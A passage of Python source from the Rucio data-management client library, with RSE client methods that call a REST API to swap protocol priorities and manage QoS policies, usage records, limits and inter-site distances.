:param operation: the operation that should be swapped i.e. read, write, or delete.
:param scheme_a: the scheme of one of the two protocols to be swapped, e.g. srm.
:param scheme_b: the scheme of the other of the two protocols to be swapped, e.g. http.
:returns: True if success.
:raises RSEProtocolNotSupported: if no matching protocol entry could be found.
:raises RSENotFound: if the RSE doesn't exist.
:raises KeyNotFound: if invalid data was provided for update.
:raises AccessDenied: if not authorized.
"""
protocol_a = protocol_b = None
protocols = self.get_protocols(rse, domain, operation, False, scheme_a)['protocols']
for p in protocols:
if p['scheme'] == scheme_a:
protocol_a = p
if p['scheme'] == scheme_b:
protocol_b = p
if (protocol_a or protocol_b) is None:
return False
priority_a = protocol_a['domains'][domain][operation]
priority_b = protocol_b['domains'][domain][operation]
self.update_protocols(rse, protocol_a['scheme'], {'domains': {domain: {operation: priority_b}}}, protocol_a['hostname'], protocol_a['port'])
self.update_protocols(rse, protocol_b['scheme'], {'domains': {domain: {operation: priority_a}}}, protocol_b['hostname'], protocol_b['port'])
return True
def add_qos_policy(self, rse, qos_policy):
"""
Add a QoS policy from an RSE.
:param rse_id: The id of the RSE.
:param qos_policy: The QoS policy to add.
:param session: The database session in use.
:raises Duplicate: If the QoS policy already exists.
:returns: True if successful, except otherwise.
"""
path = [self.RSE_BASEURL, rse, 'qos_policy', qos_policy]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST')
if r.status_code == codes.created:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_qos_policy(self, rse, qos_policy):
"""
Delete a QoS policy from an RSE.
:param rse_id: The id of the RSE.
:param qos_policy: The QoS policy to delete.
:param session: The database session in use.
:returns: True if successful, silent failure if QoS policy does not exist.
"""
path = [self.RSE_BASEURL, rse, 'qos_policy', qos_policy]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_qos_policies(self, rse):
"""
List all QoS policies of an RSE.
:param rse_id: The id of the RSE.
:param session: The database session in use.
:returns: List containing all QoS policies.
"""
path = [self.RSE_BASEURL, rse, 'qos_policy']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return loads(r.text)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def set_rse_usage(self, rse, source, used, free, files=None):
"""
Set RSE usage information.
:param rse: the RSE name.
:param source: the information source, e.g. srm.
:param used: the used space in bytes.
:param free: the free in bytes.
:param files: the number of files
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'usage']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
data = {'source': source, 'used': used, 'free': free, 'files': files}
r = self._send_request(url, type_='PUT', data=dumps(data))
if r.status_code == codes.ok:
return True
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def get_rse_usage(self, rse, filters=None):
"""
Get RSE usage information.
:param rse: the RSE name.
:param filters: dictionary of attributes by which the results should be filtered
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'usage']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET', params=filters)
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def list_rse_usage_history(self, rse, filters=None):
"""
List RSE usage history information.
:param rse: The RSE name.
:param filters: dictionary of attributes by which the results should be filtered.
:returns: list of dictionnaries.
"""
path = [self.RSE_BASEURL, rse, 'usage', 'history']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET', params=filters)
if r.status_code == codes.ok:
return self._load_json_data(r)
else:
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def set_rse_limits(self, rse, name, value):
"""
Set RSE limit information.
:param rse: The RSE name.
:param name: The name of the limit.
:param value: The feature value.
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'limits']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps({'name': name, 'value': value}))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def get_rse_limits(self, rse):
"""
Get RSE limits.
:param rse: The RSE name.
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'limits']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def delete_rse_limits(self, rse, name):
"""
Delete RSE limit information.
:param rse: The RSE name.
:param name: The name of the limit.
:returns: True if successful, otherwise false.
"""
path = [self.RSE_BASEURL, rse, 'limits']
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL', data=dumps({'name': name}))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
return exc_cls(exc_msg)
def add_distance(self, source, destination, parameters):
"""
Add a src-dest distance.
:param source: The source.
:param destination: The destination.
:param parameters: A dictionnary with property.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='POST', data=dumps(parameters))
if r.status_code == codes.created:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def update_distance(self, source, destination, parameters):
"""
Update distances with the given RSE ids.
:param source: The source.
:param destination: The destination.
:param parameters: A dictionnary with property.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps(parameters))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def get_distance(self, source, destination):
"""
Get distances between rses.
:param source: The source RSE.
:param destination: The destination RSE.
:returns distance: List of dictionaries.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_distance(self, source, destination):
"""
Delete distances with the given RSE ids.
:param source: The source.
:param destination: The destination.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg) | /rucio-clients-32.2.0.tar.gz/rucio-clients-32.2.0/lib/rucio/client/rseclient.py | 0.758063 | 0.25488 | rseclient.py | pypi |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.